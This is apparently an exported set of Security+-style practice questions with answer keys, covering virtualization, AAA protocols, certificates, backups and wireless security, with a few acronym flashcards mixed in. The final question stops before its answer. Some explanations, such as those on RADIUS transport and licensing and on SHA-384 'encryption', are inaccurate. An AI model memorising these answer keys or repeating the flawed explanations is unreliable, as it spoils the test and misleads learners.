Analyze and select the accurate statements about threats associated with virtualization. (Select all that apply.) A. Virtualizing switches and routers with hypervisors make virtualization more secure. B. VM escaping occurs as a result of malware jumping from one guest OS to another. C. A timing attack occurs by sending multiple usernames to an authentication server to measure the server response times. D. VMs providing front-end, middleware, and back-end servers should remain together to reduce security implications of a VM escaping attack on a host located in the DMZ.
B and C Virtual Machine (VM) escaping refers to malware running on a guest Operating System (OS) jumping to another guest or to the host. A timing attack occurs by sending multiple usernames to an authentication server and measuring the server's response times. Hypervisors are a common target of attacks and become more complex when the network infrastructure, such as switches and routers, is also virtualized. When the network infrastructure is implemented in software, it may not be subject to inspection and troubleshooting by system administrators. VMs providing front-end, middleware, and back-end services should be separated to different physical hosts. This reduces the security implications of a VM escaping attack on a host in the Demilitarized Zone (DMZ).
Analyze and compare iOS and Android operating systems (OS) to accurately differentiate between the two. (Select all that apply.) A. Android releases updates often, while iOS is more sporadically released. B. iOS is limited to Apple products, while Android has multiple hardware vendors. C. Android is an open source OS based on Linux, unlike iOS, which is a closed and proprietary system. D. iOS is more vulnerable to attack due to being a closed source, while Android is more secure with multiple partners working to secure the OS.
B and C iOS is the operating system for Apple's iPhone and iPad tablet. Android is an OS for smartphones and tablets, and is an open source OS. This provides more scope for hardware vendors such as Asus, LG, and Samsung. Android is an open source OS based on Linux. iOS is a closed and proprietary system. Apple makes new versions freely available for iOS, with devices typically updated very quickly. Android offers updates more sporadically, as updates are often dependent on the handset vendor to complete. Android is more vulnerable to attack than iOS. Sporadic updates, along with apps being installed from multiple vendors, reduce the security of the devices. iOS is closed source with frequent updates, providing more security.
Analyze the following scenarios and determine which best simulates the use of a content filter. (Select all that apply.) A. A system has broken down a packet containing malicious content, and erases the suspicious content, before rebuilding the packet. B. A high school student is using the school library to do research for an assignment and cannot access certain websites due to the subject matter. C. A system administrator builds a set of rules based on information found in the source IP address to allow access to an intranet. D. A system administrator blocks access to social media sites after the CEO complains that work performance has decreased due to excessive social media usage at work.
B and D A content filter restricts web use to only authorized sites. Examples of content filter use include schools restricting access to .edu sites only, or blocking sites that have adult-level content. Another example of a content filter is a workplace allowing only sites that are for work purposes. A proxy server works on a store-and-forward model and deconstructs each packet, performs analysis, then rebuilds the packet and forwards it on. A part of this process is removing suspicious content while rebuilding the packet. A system admin configures packet filtering firewalls by specifying a group of rules that define the type of data packet, and the appropriate action to take when the packet matches the rule.
A system compromise prompts the IT department to harden all systems. The technicians look to block communications to potential command and control servers. Which solutions apply to working with egress filtering? (Select all that apply.) A. Mediate the copying of tagged data B. Restrict DNS lookups C. Remove compromised root certificates D. Allow only authorized application ports
B and D A recommended filtering approach is to restrict DNS lookups to an ISP's DNS services or authorized public resolvers, such as Google's, which helps to prevent lookups of malicious hosts. Another recommended filtering approach is to allow only authorized application ports and, if possible, to restrict the destination addresses to authorized Internet hosts, which helps to avoid contact with malicious servers. Data loss prevention (DLP) pertains to protecting sensitive information by mediating the copying of tagged data to restrict it to authorized media and services. If an attacker has managed to install a root certificate on a system, the attacker can make malicious hosts and services seem trusted. Admins must remove suspicious root certificates from the client's cache. This is not an egress filtering solution.
Evaluate the threats and vulnerabilities regarding medical devices and then select accurate statements. (Select all that apply.) A. Medical devices are only those devices located outside of the hospital setting, including defibrillators and insulin pumps. B. Attackers may attempt to gain access in order to kill or injure patients, or hold medical units ransom. C. Medical devices are updated regularly to secure them against vulnerabilities and protect patient safety. D. Many portable devices, such as cardiac monitors and insulin pumps, run on unsupported operating systems.
B and D Attackers may have a goal of injuring or killing patients by tampering with dosage levels or device settings. Many of the control systems for medical devices run on unsupported versions of operating systems, such as Windows XP, because the cost of updating the software to work with newer OS versions is high and disruptive to patient services. Medical devices can be found in the hospital, in clinics, and as portable devices such as cardiac monitors, defibrillators, and insulin pumps. Medical devices may have insecure communications protocols. Many devices run on unsupported systems due to the cost and potential disruptions the update would cause.
In which of these situations might a non-credentialed vulnerability scan be more advantageous than a credentialed scan? (Select all that apply.) A. When active scanning poses no risk to system stability B. External assessments of a network perimeter C. Detection of security setting misconfiguration D. Web application scanning
B and D Non-credentialed scanning is often the most appropriate technique for external assessment of the network perimeter or when performing web application scanning. A non-credentialed scan proceeds by directing test packets at a host without being able to log on to the OS or application. A non-credentialed scan provides a view of what the host exposes to an unprivileged user on the network. A passive scan has the least impact on the network and on hosts but is less likely to identify vulnerabilities comprehensively. Configuration reviews investigate how system misconfigurations make controls less effective or ineffective, such as antivirus software not being updated, or management passwords left configured to the default. Configuration reviews generally require a credentialed scan.
Incident management relies heavily on the efficient allocation of resources. Which of the following factors should an IT manager consider regarding the overall scope of dealing with incidents in general? (Select all that apply.) A. Planning time B. Downtime C. Detection time D. Recovery time
B, C, and D Downtime is a critical factor to consider: the degree to which an incident disrupts business processes. An incident can either degrade (reduce performance) or interrupt (completely stop) the availability of an asset, system, or business process. Detection time is an important consideration, requiring that the systems used to search for intrusions are thorough and that the response to detections is fast. Recovery time must be considered, as some incidents that require complex system changes need lengthy remediation. This extended recovery period should trigger heightened alertness for continued or new attacks. Planning time can refer to the expected time for completing a project plan, or a period of time scheduled for an IT team to work together to plan out projects. It is not a consideration for incident remediation efforts.
Both Remote Access Dial-In User Service (RADIUS) and Terminal Access Controller Access-Control System (TACACS+) provide authentication, authorization, and accounting using a separate server (the AAA server). Based on the protocols' authentication processes, select the true statements. (Select all that apply.) A. TACACS+ is open source and RADIUS is a proprietary protocol from Cisco. B. RADIUS uses UDP and TACACS+ uses TCP. C. TACACS+ encrypts the whole packet (except the header) and RADIUS only encrypts the password. D. RADIUS is primarily used for network access and TACACS+ is primarily used for device administration.
B, C, and D RADIUS uses TCP or UDP by default over ports 1812 and 1813 and TACACS+ uses TCP on port 49. TACACS+ encrypts the whole packet (except the header, which identifies the packet as TACACS+ data) and RADIUS only encrypts the password portion of the packet using MD5. RADIUS is primarily used for network access for a remote user and TACACS+ is primarily used for device administration. TACACS+ provides centralized control for administrators to manage routers, switches, and firewall appliances, as well as user privileges. RADIUS is an open-source protocol, not TACACS+. TACACS+ is a Cisco proprietary protocol.
Which statement best explains the differences between black box, white box, and gray box attack profiles used in penetration testing? A. A black box pen tester acts as a privileged insider and must perform no reconnaissance. A white box pen tester has no access, and reconnaissance is necessary. A gray box actor is a third-party actor who mediates between a black box and white box pen tester. B. A black box pen tester acts as the adversary in the test, while the white box pen tester acts in a defensive role. A gray box pen tester is a third-party actor who mediates between a black box pen tester and a white box pen tester. C. In a black box pen test, the contractor receives no privileged information, so they must perform reconnaissance. In contrast, a white box pen tester has complete access and skips reconnaissance. A gray box tester has some, but not all information, and requires partial reconnaissance. D. In a white box pen test, the contractor receives no privileged information, so they must perform reconnaissance. In contrast, a black box pen tester has complete access and skips reconnaissance. A gray box tester has some, but not all information, and requires partial reconnaissance.
C A black box penetration tester receives no privileged information, while a white box tester has complete access. A white box test may follow up on a black box test. In a black box pen test, the consultant receives no privileged information about the network and its security systems. A gray box pen tester has partial access and must perform some reconnaissance. A red team performs an offensive role to try to infiltrate the target. A blue team defends a target system by operating monitoring and alerting controls to detect and prevent the infiltration. White box tests are useful for simulating the behavior of a privileged insider threat. Gray box tests are useful for simulating the behavior of an unprivileged insider threat.
Analyze and determine the role responsible for managing the system where data assets are stored, and is responsible for enforcing access control, encryption, and backup measures. A. Data owner B. Data steward C. Data custodian D. Privacy officer
C A data custodian is responsible for managing the system where data assets are stored, including responsibility for enforcing access control, encryption, and backup or recovery measures. A data owner has the ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. The data steward is primarily responsible for data quality, such as ensuring data is labeled and identified with appropriate metadata. The privacy officer is responsible for oversight of any Personally Identifiable Information (PII) assets managed by the company and ensures that the processing and disclosure of PII comply with the legal and regulatory frameworks.
A security expert needs to review systems information to conclude what may have occurred during a breach. The expert reviews NetFlow data. What samples does the expert review? A. Protocol usage and endpoint activity B. Traffic statistics at any layer of the OSI model C. Statistics about network traffic D. Bandwidth usage and comparative baselines.
C A flow collector is a means of recording metadata and statistics about network traffic rather than recording each frame. Network traffic and flow data may come from a wide variety of sources. A SIEM collects data from sensors. The information captured from network packets can be aggregated and summarized to show overall protocol usage and endpoint activity. sFlow, developed by HP and subsequently adopted as a web standard, uses sampling to measure traffic statistics at any layer of the OSI model for a wide range of protocol types. If one has reliable baselines for comparison, bandwidth usage can be a key indicator of suspicious behavior. Unexpected bandwidth consumption could be evidence of a data exfiltration attack.
A system breach occurs at a retail distribution center. Data from a persistent disk is required as evidence. No write blocker technology is available. Which approach does a security analyst use to acquire the disk? A. Carving B. Cache C. Snapshot D. Artifact
C A snapshot is a live acquisition image of a persistent disk. It may have less validity than an image taken from a device using a write blocker technology. Fragments on a disk might represent deleted or overwritten files. The process of recovering them is carving. Cache can refer either to hardware components or software. The system uses a software-based cache in the file system, and when needed, the admin can acquire it as part of a disk image. Artifacts refer to any type of data that is not part of the mainstream data structures of an operating system.
An attacker tricks a host within a subnet into routing through an attacker's machine, rather than the legitimate default gateway, allowing the attacker to eavesdrop on communications and perform a Man-in-the-Middle (MitM) attack. Compare the types of routing vulnerabilities and conclude what the attacker is exploiting in this scenario. A. Route injection B. Denial of service C. ARP poisoning D. Source routing
C ARP poisoning occurs by tricking hosts on the subnet into routing through the attacker's machine rather than the legitimate default gateway. This allows the attacker to eavesdrop on communications and perform replay or MitM attacks. Route injection occurs when routing protocols have weak or no authentication. This can mean traffic misdirected to a monitoring port, sent to a black hole, or continuously looped. Denial of service is redirecting traffic to routing loops or black holes, or overloading the router. Source routing uses an option in the IP header to pre-determine the route a packet must take through the network.
A system analyst is tasked with searching the dark web for harvested customer data. Because these sites cannot be found in a standard website search, what must the analyst have in order to search for the harvested information? A. The Onion Router (TOR) B. Dark web search engine C. Dark Website URL D. Open Source Intelligence (OSINT)
C Deep web sites, especially those hidden from search engines, are accessed via the website's URL. These are often only available via "word of mouth" bulletin boards. The Onion Router (TOR) is software used to establish a network overlay to the Internet infrastructure to create the dark net. TOR, along with other software like Freenet or I2P, anonymizes the usage of the dark net. A dark web search engine can be used to find dark web website collections, which constitute roughly 1% of the deep web. Some dark web websites have hidden IP addresses and cannot be found by search engines or require additional software to gain access to the site. Open-source intelligence (OSINT) is cybersecurity-relevant information harvested from public websites and data records.
Evaluate the Agile paradigm within a Software Development Lifecycle (SDLC) to determine which statement demonstrates the idea of continuous tasks. A. Devising an application's initial scope and vision for the project B. Prioritizing the requirements and work through the cycles of designing, developing, and testing C. Releasing well-tested code in smaller blocks D. Perform the final integration and testing of the solution
C Agile development flips the waterfall model by iterating through phases concurrently on smaller modules of code. In this model, development and provisioning tasks are conceived as continuous. The concept phase includes devising the initial scope and vision for the project and determining its feasibility. The iteration phase consists of prioritizing requirements and working through cycles of designing, developing, testing, and test deploying solutions to the project goals. The transition phase includes performing the final integration and testing of the solution and preparing for deployment in the user environment.
Digital certificates are based on the X.509 standard that defines the fields (or information) about a subject (or entity using the certificate) and the certificate's issuer. Which of the following fields would not be included in a standard public certificate? A. Extensions B. Public key C. Endorsement key D. Subject
C An endorsement key is not required for a digital certificate. It is part of a Trusted Platform Module (TPM) and used to create subkeys for key storage, signature, and encryption operations. The Extensions field defines which extended attributes a certificate supports. V3 certificates can be defined with extended attributes, such as friendly subject or issuer names, contact email addresses, and intended key usage. The Public key field denotes the public key and algorithm used by the certificate holder. This key is distributed to the public to initiate a secure connection with a website or remote server. The Subject field names the certificate holder, expressed as a distinguished name (DN). Within this, the common name (CN) usually matches either the fully qualified domain name (FQDN) of a server or a user email address.
A threat actor programs an attack designed to invalidate memory locations to crash target systems. Which statement best describes the nature of this attack? A. The attacker created a null pointer file to conduct a dereferencing attack. B. The attacker programmed a dereferencing attack. C. The attacker programmed a null pointer dereferencing exception. D. The attacker created a race condition to perform a null pointer dereferencing attack.
C Dereferencing occurs when a pointer variable stores a memory location and the program attempts to read or write that memory address via the pointer. If the memory location is invalid or null, this creates a null pointer dereference type of exception and the process may crash. Dereferencing does not mean deleting or removing; it means read or resolve. A null pointer might allow a threat actor to run arbitrary code. Programmers can use logic statements to test that a pointer is not null before trying to use it. A race condition is one means of engineering a null pointer dereference exception. Race conditions occur when processes depend on timing and order, and those events fail to execute in the order and timing intended.
An engineer looks to implement security measures by following the five functions in the National Institute of Standards and Technology (NIST) Cybersecurity Framework. When documenting the "detect" function, what does the engineer focus on? A. Evaluate risks and threats B. Install, operate, and decommission assets C. Ongoing proactive monitoring D. Restoration of systems and data
C Detect refers to performing ongoing proactive monitoring to ensure that controls are effective and capable of protecting against new types of threats. Identify covers developing security policies and capabilities, evaluating risks, threats, and vulnerabilities, and recommending security controls to mitigate them. Protect and procure covers the processes to install, operate, and decommission IT hardware and software assets with security as an embedded requirement of every stage of an operations life cycle. Recovery deals with the implementation of cybersecurity resilience to restore systems and data if other controls are unable to prevent attacks.
The first responder to a security incident decides the issue requires escalation. Consider the following and select the scenario that best describes escalation in this issue. A. The first responder calls the company's legal team. B. The first responder shuts down the affected system. C. The first responder calls senior staff to get them involved. D. The first responder reviews user privileges to look for users who may have gained unauthorized privileges.
C Escalation is the process of involving additional senior staff to assist in incident management when the first responder feels the situation is too complex to manage alone. "Pulling the plug" on an affected system is an option to contain an attack, but it is not the definition of escalation. Although it is important to have access to legal expertise, who can evaluate the incident response from the perspective of compliance with laws and industry regulations, contacting the legal department is not an example of escalation. The term escalation can describe when a user gains additional privileges without authorization. However, this is within the context of privilege management, not incident response.
Evaluate the following controls that have been set by a system administrator for an online retailer. Determine which statement demonstrates the identification control within the Identity and Access Management (IAM) system. A. A control is set to force a customer to log into their account prior to reviewing and editing orders. B. A control is set to cancel automatic shipments for any customer that has an expired credit card on file. C. A control is set to ensure that billing and primary delivery addresses are valid. D. A control is set to record the date, time, IP address, customer account number, and order details for each order.
C Identification controls are set to ensure that customers are legitimate. An example is to ensure that billing and primary delivery addresses are real and valid. Authentication controls are to ensure that customers have unique accounts, and that only they can manage their orders and billing information. An example is to require each customer create an account prior to allowing them to store billing or shipping information. Authorization controls are to ensure customers can only place orders when they have valid payment information in place prior to completing an order. Accounting controls include maintaining a record of each action taken by a customer to ensure that they cannot deny placing an order. Records may include order details, date, time, and IP address information.
A company determines the mean amount of time to replace or recover a system. What has the company calculated? A. MTBF B. KPI C. MTTR D. MTTF
C Mean Time to Repair (MTTR) is a measure of the time taken to correct a fault to restore the system to full operation. This is also known as mean time to replace or recover and is important in determining the overall Recovery Time Objective (RTO). The Mean Time Between Failures (MTBF) represents the expected lifetime of a product and is for items that are repairable, such as a server. Key Performance Indicators (KPIs) determine the reliability of each asset. Main KPIs include MTBF and MTTR. Mean Time to Failure (MTTF) represents the expected lifetime of a product and is for assets that are not repairable, such as a hard drive.
Which of the following considerations is most important when employing a signature-based intrusion detection system? A. The system may produce false positives and block legitimate activity. B. The system must create a valid baseline signature of normal activity. C. Signatures and rules must be kept up to date to protect against emerging threats. D. Signatures and rules must be able to detect zero-day attacks.
C Network behavior and anomaly detection (NBAD) engines use heuristics to generate a statistical model of baseline normal traffic. The system generates false positives and false negatives until, over time, it improves its statistical model of normal activity. A false positive is where legitimate behavior generates an alert. Behavioral-based detection engines are trained to recognize baseline "normal" traffic or events. Anything that deviates from this baseline generates an incident. The signatures and rules (often called plug-ins or feeds) powering intrusion detection need updating regularly to provide protection against the latest threat types. Behavioral-based detection software attempts to identify zero-day attacks, insider threats, and other malicious activity, for which there is a single signature that deviates from the baseline.
A security engineer encrypted traffic between a client and a server. Which security protocol is the best for the engineer to configure if an ephemeral key agreement is used? A. AES 256 B. TLS 1.2 C. TLS 1.3 D. SHA 384
C Only ephemeral key agreement is supported in TLS 1.3. The signature type is supplied in the certificate, so the cipher suite only lists the bulk encryption key strength and mode of operation (AES_256_GCM), plus the cryptographic hash algorithm (SHA384). Prior to TLS 1.3, Elliptic Curve Diffie-Hellman Ephemeral mode for session key agreement, RSA signatures, 128-bit AES-GCM (Galois Counter Mode) for symmetric bulk encryption, and 256-bit SHA for HMAC functions could be used. AES 256 refers to a mode of operation used by TLS to encrypt data that is communicated between systems. SHA 384 refers to a cryptographic hashing algorithm that is used for encryption by protocols such as TLS.
Which statement best describes the difference between session affinity and session persistence? A. With persistence, once a client device establishes a connection, it remains with the node that first accepted its request, while an application-layer load balancer uses session affinity to keep a client connected by setting up a cookie. B. Session affinity makes node scheduling decisions based on health checks and processes incoming requests based on each node's load. Session persistence makes scheduling decisions on a first in, first out (FIFO) basis. C. With session affinity, when a client establishes a session, it remains with the node that first accepted its request, while an application-layer load balancer uses persistence to keep a client connected by setting up a cookie. D. Session persistence makes scheduling decisions based on traffic priority and bandwidth considerations, while session affinity makes scheduling decisions based on which node is available next.
C Session affinity is a layer 4 approach to handling user sessions. When a client establishes a session, it stays with the node that first accepted the request. Most network appliances process packets on a best effort and FIFO basis. Layer 4 load balancers only make basic connectivity tests, while layer 7 appliances can test the application's state. An application-layer load balancer uses persistence to keep a client connected to a session. Persistence typically works by setting a cookie, which can be more reliable than session affinity. Quality of Service (QoS) prioritizes traffic based on its characteristics, like bandwidth requirements for video and voice applications. A round robin is a simple form of scheduling that picks the next node.
A web administrator visits a website after installing its certificate to test the SSL binding. The administrator's client computer did not trust the website's certificate. The administrator views the website's certificate from the browser to determine which certificate authority (CA) generated the certificate. Which certificate field would assist with the troubleshooting process? A. Subject alternative name B. Signature algorithm C. Issuer D. Subject
C The Issuer field provides the name of the certificate authority (CA) that generated and issued the certificate for the web server. The subject alternative name (SAN) displays the extension field to identify the domain name system (DNS) name or names by which a host is identified. The Signature algorithm field displays the algorithm used by the certificate authority to sign the certificate. The Subject field displays the name of the certificate holder, expressed as a distinguished name (DN). The common name (CN) in this part would match the fully qualified domain name (FQDN) of the server or a user email address.
Windows has several service account types, typically used to run processes and background services. Which of the following statements about service accounts is FALSE? A. The Network service account and the Local service account have the same privileges as the standard user account. B. Any process created using the system account will have full privileges over the local computer. C. The local service account creates the host processes and starts Windows before the user logs on. D. The Local Service account can only access network resources as an anonymous user.
C The System account, not the Local Service account, creates the host processes that start Windows before the user logs on. The Network Service account and the Local Service account have the same privileges as the standard user account. Standard users have limited privileges, typically with access to run programs and to create and modify files belonging only to their profile. Any process created using the System account will have full privileges over the local computer. The System account has the most privileges of any Windows account. The Local Service account can only access network resources as an anonymous user, unlike a Network Service account. Network Service accounts can present the computer's account credentials when accessing network resources.
A Department of Defense (DoD) security team identifies a data breach in progress, based on some anomalous log entries, and takes steps to remedy the breach and harden their systems. When they resolve the breach, they want to publish the cyber threat intelligence (CTI) securely, using standardized language for other government agencies to use. The team will transmit the threat data feed via which protocol? A. Structured Threat Information eXpression (STIX) B. Automated Indicator Sharing (AIS) C. Trusted Automated eXchange of Indicator Information (TAXII) D. A code repository protocol
C The TAXII protocol provides a means for transmitting CTI data between servers and clients. Subscribers to the CTI service obtain updates to the data to load into analysis tools over TAXII. While STIX provides the syntax for describing CTI, the TAXII protocol transmits CTI data between servers and clients. The Department of Homeland Security's (DHS) Automated Indicator Sharing (AIS) is especially aimed at Information Sharing and Analysis Centers (ISACs), but private companies can join too. AIS is based on the STIX and TAXII standards and protocols. A file/code repository holds signatures of known malware code.
A network administrator regularly reviews group membership and access control lists for each resource. The administrator also looks for unnecessary accounts to disable. What is the administrator executing in this situation? A. Recertification B. Logging C. Permission auditing D. Usage auditing
C The administrator is permission auditing, which involves the regular review of privileges such as group membership and access control lists for each resource, plus identifying and disabling unnecessary accounts. Recertification is a security control where an admin audits user access privileges to ensure they are accurate and adhere to relevant standards and regulations. A resource or user change triggers recertification. Logging is an automated process of capturing data to provide information on the use of the website, alerts of any unusual or suspicious behavior, and audit changes made to pages and settings. Usage auditing means configuring the security log to record key indicators, then reviewing the logs for suspicious activity. This process does not involve reviewing user privileges.
A systems administrator configures several subnets within a virtual private cloud (VPC). The VPC has an Internet gateway attached to it; however, the subnets remain private. What does the administrator do to make the subnets accessible by the public? A. Configure any VPC endpoints. B. Create a VPN between VPCs. C. Configure a default route for each subnet. D. Create a VPC for each subnet.
C The administrator must configure the Internet gateway as the default route for each public subnet. If the admin does not configure a default route, the subnet remains private, even if the VPC has an Internet gateway attached to it. Connections to other services such as storage or services running in other VPCs are possible with VPC endpoint configurations. While VPCs remain private from each other, the admin can create a CSP-managed feature or a VPN to connect the VPCs and VPNs. Multiple VPCs are not required. A VPC is an isolated virtual cloud that can contain many subnets.
An employee has arrived to work and logged into the network with their smart card. This employee now has access to the company databases, email, and shared network resources. Evaluate all of the basic authorization policies and determine the policy best illustrated in this scenario. A. Least privilege B. Implicit deny C. Single Sign-On (SSO) D. Access key
C This company is using a Single Sign-On (SSO) policy. This means that a user only has to authenticate to a system once to gain access to all the resources to which the system has granted rights to the user. An example is when a user authenticates with Windows and is thereby also authenticated to the Windows domain's SQL Server and Exchange Server services. Least privilege means that the system grants the rights necessary for users to perform their job and no more. Implicit deny is the foundation of a system's access control. This means that unless there is a rule specifying that a system grants access to a user, the system will deny any access request. The system generates an access key for a user when the user supplies authentication data. The system compares it with the server's security database, and both must match. The server security service generates the access key.
A systems engineer reviews recent backups for a production server. While doing so, the engineer discovers that archive bits on files are clearing and incorrect backup types have been occurring. Which backup type did the engineer intend to use if the bit should not be cleared? A. Snapshot B. Full C. Differential D. Incremental
C With a differential backup, all new and modified files since the last full backup are part of the backup set. With a differential backup type, the archive bit on a file is not cleared. A full backup includes all selected data regardless of when the previous backup occurred. With a full backup type, the archive bit on a file is cleared. Snapshots are a means of getting around the problem of open files when performing a backup. Snapshots use a copy of the data rather than the live data. With an incremental backup type, new files, as well as files modified since the last backup, are part of the backup set. With an incremental backup type, the archive bit on a file is cleared.
Which of the following is an example of the process of identifying and de-duplicating files and metadata to be stored for evidence in a trial? A. Legal hold B. Forensics C. eDiscovery D. Due process
C eDiscovery is a means of filtering the relevant evidence produced from all the data gathered by a forensic examination and storing it in a database in a format to use as evidence in a trial. Legal hold refers to the fact that information that may be relevant to a court case must be preserved. Forensics is the practice of collecting evidence from computer systems to an accepted standard in a court of law. Due process is a term used in common law to require that people only be convicted of crimes following the fair application of the laws of the land.
Choose which of the following items classify as Personally Identifiable Information. (Select all that apply.) A. Job position B. Gender C. Full name D. Date of birth
C and D A full name can be used to identify, contact, or locate an individual. A full name is an identifier and can be used to search for a person to locate more PII that can be used to contact or locate a person. A date of birth can be used to identify, contact, or locate an individual. This information is often used when verifying identity and may be used by an attacker to obtain unauthorized access into accounts and obtain other PII. A job position is not considered PII. The position is not considered a person and is typically categorized as public information. Having the sole information of the name of a job position does not arm an attacker with the ability to identify, contact, or locate an individual. Gender is not considered PII and is not unique to an individual. This information will not assist an attacker with contacting, identifying, or locating an individual.
A malicious party adds malware to a popular video game and offers free copies to users. The party's objective is to require the CD to be inserted during use. This software will gain administrative rights, change system files, and may hide from detection without the knowledge or consent of the user. Consider the malware characteristics and determine which may be used. (Select all that apply) A. Spyware B. Keylogger C. Rootkit D. Trojan
C and D A rootkit is characterized by its ability to hide itself by changing core system files and programming interfaces and to escalate privileges. The gaming company accomplished this. Trojans cannot conceal their presence entirely and will surface as a running process or service. While a rootkit is a type of Trojan, it differs in its ability to hide itself. Spyware monitors user activity and may be installed with or without the user's knowledge, but it cannot gain administrative privileges or hide itself. A keylogger is also a type of spyware that records a user's keystrokes. It occurs without a user's knowledge, but it cannot hide itself or gain privileges.
A security professional is looking to harden systems at an industrial facility. In particular, the security specialist needs to secure an HVAC system that is part of an IoT network. Which areas does the specialist look to secure from data exfiltration exploits? (Select all that apply.) A. Edge devices B. Data center C. Fog node D. Edge gateway
C and D A security specialist can incorporate fog nodes as a data processing layer positioned close to edge gateways, assisting the prioritization of critical data transmission. Fog nodes are high-value targets for both denial of service and data exfiltration attacks. Edge gateways perform some pre-processing of data to and from edge devices to enable prioritization. They also perform the wired or wireless connectivity to transfer data to and from the storage and processing networks. Edge gateways are high-value targets to exploit. Edge devices collect and depend upon data for their operation. In this case it would help to harden the HVAC devices or the route to the HVAC devices. The cloud or data center provides the main storage and processing resources, plus distribution and aggregation of data. The IoT network is typically segmented from the main data center.
DC
Domain Component
Analyze the features of a Full Disk Encryption (FDE) to select the statements that accurately reflect this type of security. (Select all that apply.) A. FDE encrypts the files that are listed as critical with one encryption key. B. The encryption key that is used for FDE can only be stored in a TPM on the disk for security. C. A drawback of FDE is the cryptographic operations performed by the OS reduces performance. D. FDE requires the secure storage of the key used to encrypt the drive contents.
C and D FDE means that the entire contents of the drive, including system files and folders, are encrypted. The cryptographic operations performed by the OS reduce performance. FDE normally utilizes a Trusted Platform Module (TPM) to secure the storage of the key used to encrypt the drive contents. FDE means that the entire content of the drive (or volume), including system files and folders, is encrypted. This is not limited to only critical files. FDE requires secure storage of the key used to encrypt the drive contents. Normally, this is in a TPM. It is also possible to use a removable USB drive if USB is a boot device option.
Analyze the available detection techniques and determine which are useful in identifying a rogue system through software management. (Select all that apply.) A. Visual inspection of ports and switches will prevent rogue devices from accessing the network. B. Network mapping is an easy way to reveal the use of unauthorized protocols on the network or unusual traffic volume. C. Intrusion detection and NAC are security suites and appliances that combine automated network scanning with defense and remediation suites to prevent rogue devices from accessing the network. D. Wireless monitoring can reveal whether there are unauthorized access points.
C and D Intrusion detection and NAC are security suites and appliances that can combine automated network scanning with defense and remediation suites to prevent rogue devices from accessing the network. Wireless monitoring can reveal the presence of unauthorized or malicious access points and stations. Visual inspection of ports/switches will reveal any obvious unauthorized devices or appliances; however, a sophisticated attack can prevent observation, such as creating fake asset tags. Network mapping can identify hosts unless an OS is actively trying to remain unobserved by not operating when scans are running. Identifying a rogue host on a large network from a scan may still be difficult.
A system administrator is setting up a new Simple Mail Transfer Protocol (SMTP) configuration. Make recommendations for how the administrator should configure the ports. (Select all that apply.) A. Port 110 should be used by mail clients to submit messages for delivery. B. Port 143 should be used to connect clients. C. Port 25 should be used for message relay. D. Port 465 should be used for message submission over implicit TLS.
C and D Port 25 is used for message relay between Simple Mail Transfer Protocol (SMTP) servers or Message Transfer Agents (MTA). If security is required and supported by both servers, the STARTTLS command can be used to set up the secure connection. Port 465 is used by providers and mail clients for message submission over implicit Transport Layer Security (TLS). Port 587, versus 110, is used by mail clients (Message Submission Agents) to submit messages for delivery by an SMTP server. Port 143 is used by Internet Message Access Protocol (IMAP) to connect clients. IMAP supports permanent connections to a server and connecting multiple clients to the same mailbox simultaneously.
An engineer creates a new virtualized cloud server with no security settings. What actions are typically recommended to secure such a resource? (Select all that apply.) A. Ensure virtual machines are logging all events for auditing. B. Enforce the principle of most privilege for access to VMs. C. Ensure software and hosts are patched regularly. D. Configure devices to support isolated communications.
C and D Virtual Machine (VM) software, hosts, and guest Operating Systems (OS) should be patched at regular intervals. Regular patching provides fixes for identified vulnerabilities. Virtual networking devices should be configured to support isolated communications wherever necessary. This will allow communications only with the necessary clients. Virtual machines should log all critical events rather than all events. Logging all events will be counterproductive, as critical events could be missed due to too much data. The principle of least privilege for access to virtual machines should be utilized for security purposes. Most privilege would not maximize security for virtualized or cloud-based resources.
A company is reviewing the options for installing a new wireless network. They have requested recommendations for utilizing WEP, WPA, or WPA2. Differentiate between Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). Determine which of the following statements accurately distinguishes between the options. (Select all that apply.) A. WEP and WPA use RC4 with a Temporal Key Integrity Protocol (TKIP), while WPA2 uses a 24-bit Initialization Vector (IV). WPA2 combines the 24-bit IV with an Advanced Encryption Standard (AES) to add security. B. WEP is the strongest encryption scheme, followed by WPA2, then WPA. WEP is difficult to crack when protected by a strong password, or if deploying enterprise authentication. WPA2 is more vulnerable to decryption due to replay attack possibilities. C. WPA and WEP use RC4, while WEP uses a 24-bit Initialization Vector (IV). WPA uses a Temporal Key Integrity Protocol (TKIP), and WPA2 uses an Advanced Encryption Standard (AES) for encryption. D. WPA2 is the strongest encryption scheme, followed by WPA, then WEP. WPA2 is difficult to crack if protected by a strong password, or if deploying enterprise authentication. WEP is more vulnerable to decryption due to replay attack possibilities.
C and D WPA2 uses the Advanced Encryption Standard (AES) for encryption, while WPA and WEP use RC4. WPA combines RC4 with the Temporal Key Integrity Protocol (TKIP), while WEP uses a 24-bit Initialization Vector (IV). WPA2 is the strongest encryption scheme due to the use of AES. WPA is stronger than WEP because of TKIP. WEP uses the 24-bit IV, which has known vulnerabilities and is the weakest encryption system of the three. A strong password, or the use of enterprise authentication, makes WPA difficult to crack. WEP is the most vulnerable due to the possibility of replay attacks. The encryption options have grown stronger with each development, with WEP deploying first, followed by WPA and WPA2.
Which of the following are types of log collection for SIEM? (Select all that apply.) A. Log aggregation B. Firewall C. Agent-based D. Listener/Collector
C and D With the agent-based approach, one must install an agent service on each host. As events occur on the host, logging data is filtered, aggregated, and normalized at the host, then sent to the SIEM server for analysis and storage. With the listener/collector approach, rather than installing an agent, hosts can be configured to push updates to the SIEM server using a protocol such as syslog or SNMP. A process runs on the management server to parse and normalize each log/monitoring source. Log aggregation refers to normalizing data from different sources so that it is consistent and searchable; it does not refer to a type of log collection. Firewalls are a source of logs that are often sent into a SIEM, but they are not a type of log collection for SIEMs.
CASB
Cloud Access Security Broker
CN
Common Name
CSRF
Cross-Site Request Forgery
A network manager suspects that a wireless network is undergoing a deauthentication attack. Applying knowledge of wireless network attacks, which scenario best supports the network manager's suspicion? A. A network experiences radio interference, which causes connectivity issues for users. The users disconnect from the network, and upon reauthenticating, they log on to an evil twin Access Point (AP). B. An attacker creates an Access Point (AP) using a similar name as a legitimate AP, in an attempt to have users authenticate through the rogue AP in order to gain authentication information. C. A rogue Access Point (AP) captures user logon attempts. The attacker uses this information to authenticate to the system and obtain critical data. D. A group of users suddenly disconnects from the network. When the users reconnect, they actually connect to an evil twin Access Point (AP), which gives an attacker information about authentication.
